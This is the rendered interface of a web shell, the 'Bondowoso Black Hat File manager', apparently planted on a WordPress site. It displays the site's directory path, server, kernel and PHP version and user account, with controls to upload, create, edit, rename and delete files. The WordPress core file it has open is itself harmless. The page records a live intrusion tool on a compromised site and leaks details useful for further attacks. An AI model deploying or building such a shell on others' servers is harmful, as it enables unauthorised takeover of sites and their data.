Bondowoso Black Hat File manager
Mr Exsploit Wmc
📁 Current Path:
🏠 Root
/
home
/
sc2yubq5167
/
sos-tout-debarras.com
/
wp-includes
⬆️ Go Up (..)
📊 Server Information
Server:
Apache
System:
Linux 4.18.0-553.75.1.lve.el8.x86_64
PHP Version:
8.1.34
User:
sc2yubq5167
Directory:
/home/sc2yubq5167/sos-tout-debarras.com/wp-includes
Free Space:
3.6 TB
🔧 Quick Actions
📤 Upload File
📁 Create Folder
📄 Create File
✏️ Editing: view-transitions.php
<?php /** * View Transitions API. * * @package WordPress * @subpackage View Transitions * @since 7.0.0 */ /** * Enqueues View Transitions CSS for the admin. * * @since 7.0.0 */ function wp_enqueue_view_transitions_admin_css(): void { wp_enqueue_style( 'wp-view-transitions-admin' ); } /** * Gets the CSS for View Transitions in the admin. * * @since 7.0.0 * * @return string The CSS. */ function wp_get_view_transitions_admin_css(): string { $affix = SCRIPT_DEBUG ? '' : '.min'; $path = ABSPATH . "wp-admin/css/view-transitions{$affix}.css"; return file_get_contents( $path ); }
💾 Save
❌ Cancel
×
📤 Upload File
Select File (Max: 10 MB):
📤 Upload
❌ Cancel
×
📁 Create Folder
Folder Name:
Only letters, numbers, hyphens, underscores, and dots allowed
📁 Create
❌ Cancel
×
📄 Create File
File Name:
Only letters, numbers, hyphens, underscores, and dots allowed
📄 Create
❌ Cancel
×
✏️ Rename Item
New Name:
Only letters, numbers, hyphens, underscores, and dots allowed
✏️ Rename
❌ Cancel
×
🗑️ Delete Confirmation
Are you sure you want to delete "
"?
⚠️ This action cannot be undone!
🗑️ Yes, Delete
❌ Cancel